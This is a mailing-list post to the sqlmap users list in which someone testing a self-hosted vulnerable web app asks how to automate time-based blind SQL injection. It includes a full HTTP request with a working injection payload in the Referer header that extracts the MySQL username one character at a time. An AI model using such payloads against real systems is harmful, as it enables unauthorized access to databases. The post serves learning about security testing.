In my situation, my vulnerable parameter is Referer in the HTTP headers. I am able to enumerate the username and database name manually, but can someone explain or point me to an article that gives details about sqlmap and time-based with mysql? Here is an example of how I was able to enumerate the name. I'm unsure if there's any "custom" way of getting sqlmap work with this.
Code: GET /vulnwebapp/index.php?id=2 HTTP/1.1 Host: 192.168.127.133 Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: '+IF(SUBSTRING(USER(),1,1)='r',SLEEP(5),1)+' Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 FYI, I'm testing this on a vulnerable web app hosted by myself. So with the above request, the page sleeps because the first character of the current username is "r", which eventually allows me to change 1,1 to 2,1 and so forth until I figure out that the username is "root." Is there any way to get sqlmap to assist with this type of attack? Thanks, ------------------------------------------------------------------------------ Don't let slow site performance ruin your business. Deploy New Relic APM Deploy New Relic app performance management and know exactly what is happening inside your Ruby, Python, PHP, Java, and .NET app Try New Relic at no cost today and get our sweet Data Nerd shirt too! http://p.sf.net/sfu/newrelic-dev2dev _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
